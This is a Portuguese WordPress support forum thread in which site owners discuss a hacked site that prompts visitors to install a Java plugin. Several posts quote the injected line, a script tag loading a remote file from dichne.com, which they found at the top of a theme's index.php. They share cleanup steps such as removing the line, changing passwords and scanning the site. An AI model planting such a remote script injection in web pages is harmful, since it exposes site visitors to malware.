Suporte » Outros assuntos » Meu site pede o plugin Java, é hacker?

  • Resolvido Thiago Alexandre

    (@thiago-alexandre)


    Hoje ao acessar o meu site, eu me deparei com um pedido do chrome para eu instalar o Plugin-Java.

    Logo percebi que se tratava de um problema, pois o pouco que eu conheço do assunto, Java serve para acessar um computador certo?
    e não tem nada no meu site que necessita de Java.

    Outro problema que surgiu foi o no IE9
    parece que o doctype sumiu, e o site entra em modo quick automaticamente.

    Será que alguém invadiu meu site?

    o site é http://www.pururin.com.br

    o único problema que eu encontro é a minha pasta principal public_html
    que tem permissão 770, já tentei mudar e diz que não tenho autorização,
    já entrei em contato com a UOL host e eles me falaram que não posso mudar a permissão dessa pasta.

    Enfim, estou mais perdido que cego em tiroteiro, e não quero prejudicar as pessoas que acessam meu site. me ajudem!

    obrigado desde já

Visualizando 15 respostas - 1 até 15 (de um total de 22)
  • Criador do tópico Thiago Alexandre

    (@thiago-alexandre)

    Estou adicionando informação, eu fui no INDEX.php e encontrei um script suspeito:

    <script type="text/javascript" src="http://dichne.com/js/Check.php"></script>

    ele que faz chamar o java, e isso prova que alguém aplicou isso ali…

    fiquei preocupado com a proteção do meu site, será que é a permissão 770 que permitiu o individuo aplicar esse script ali?

    Olá,

    Mantenha o WordPress sempre atualizado, a versão 2,9 tinha um problema de segurança desse tipo.

    QUem pede o java em seu site diz ser o serviço dropbox (armazenagem de arquivos).

    Criador do tópico Thiago Alexandre

    (@thiago-alexandre)

    Obrigado pela resposta Diana, o meu wordpress está atualizado na última versão.

    quanto ao java estar solicitando o dropbox, deve fazer parte do malware que foi aplicado.

    sinto que terei que tirar o site do ar até o problema ser resolvido.
    para evitar que os meus usuários sejam prejudicados.

    tem alguma forma de encontrar de onde está vindo essa requisição em java?
    qual parte do meu site?

    Estou com um problema similar, o mais estranho que ele só aconteceu após o upgrade para a nova versão… antes nunca passei por isso

    Criador do tópico Thiago Alexandre

    (@thiago-alexandre)

    Luke no meu caso estava normal, e aconteceu o problema derrepente…
    uma caractarística é o IE9 estar fixado na lateral esquerda.

    eu estou procurando alguma forma de encontrar esse malware, alguém sabe como?

    Se for = ao meu ele esta na página index de seu tema, abra ela e olha se na primeira linha e encontre o código: <script type=”text/javascript” src=”http://dichne.com/js/Check.php”></script&gt;

    Remova esse código que o problema desaparece…

    A questão é como alguem alterou o arquivo??? essa é minha dúvida, e mesmo trocando pode ser que daqui um dia ou mais ou menos ele será alterado novamente e vc tem que ficar tirando o código…

    Quero algo definitivo… comigo depois da atualização do wordpress aconteceu essa alteração 4 vezes

    Criador do tópico Thiago Alexandre

    (@thiago-alexandre)

    Luke, eu removi o mesmo <script> do topo,
    porém ele apenas forçava o navegador a pedir para instalar o JAVA.
    se a pessoa tem java ele ativa automaticamente.
    No firefox ele continua pedindo para aceitar o plugin para funcionar

    e no IE9 continua jogado na lateral.

    Não sei se foi o seu caso, mas o malware continua lá escondido.

    de ultima opção vou pedir para a hospedagem restaurar o backup de 7 dias atrás. =/

    Então tem em outras páginas ou algo que ele esta chamando na index, dá uma olhada no código… no meu caso resolveu… mas depois de alguns dias volta

    Olhando o código html do seu site ele ainda tá lá

    <script type=”text/javascript” src=”http://dichne.com/js/Check.php”></script&gt;
    <!DOCTYPE html PUBLIC “-//W3C//DTD XHTML 1.0 Transitional//EN” “http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd”&gt;
    <html xmlns=”http://www.w3.org/1999/xhtml”&gt;

    <head>

    Pessoal, encontrei esse mesmo script na página de um cliente hoje cedo.

    Qual hospedagem vcs estão usando? Pode ser uma coisa local… Esse cliente está na StarHost.

    Não é hospedagem… é alguma falha ou no wordpress e/ou em algum plugin…

    Criador do tópico Thiago Alexandre

    (@thiago-alexandre)

    Ricardo Moraleida e luke_makey, a minha hospedagem é da UOL host.

    Aconteceu depois que atualizei o wordpress para a versão 3.2.2
    se esse é o problema eu não sei, mas é uma possibilidade.

    As permissões de pasta e arquivos de vocês estão corretas?

    Também estou sismado com o meu também dar problema após a atualização para nova versão do wordpress… O meu esta na Alog…

    Aparentemente no meu esta tudo ok, refiz várias configurações do site para tentar ver se resolve…

    Mudei o arquivo que sempre é alterado para permissão 444 estou na esperança que isso resolva…

    Mas o problema maior que vejo é que ninguem sabe o que é exatamente, isso é muito preocupante para que usa a plataforma wordpress…

    Pra mim está com cara de uma injeção simples.

    O código estava na primeira linha do index.php em

    /wp-content/themes/tema/

    Retirei, troquei as senhas, agora to terminando a verificação de BD e outros arquivos pra ver se tem mais coisa.

    O WP do cliente era 3.3.1.

    Ah, sim… antes de tirar, o script estava sendo acusado no Sucuri. Depois das senhas trocadas e da linha apagada, agora ela lista como tudo certo:

    http://sitecheck.sucuri.net/scanner/

Visualizando 15 respostas - 1 até 15 (de um total de 22)
  • O tópico ‘Meu site pede o plugin Java, é hacker?’ está fechado para novas respostas.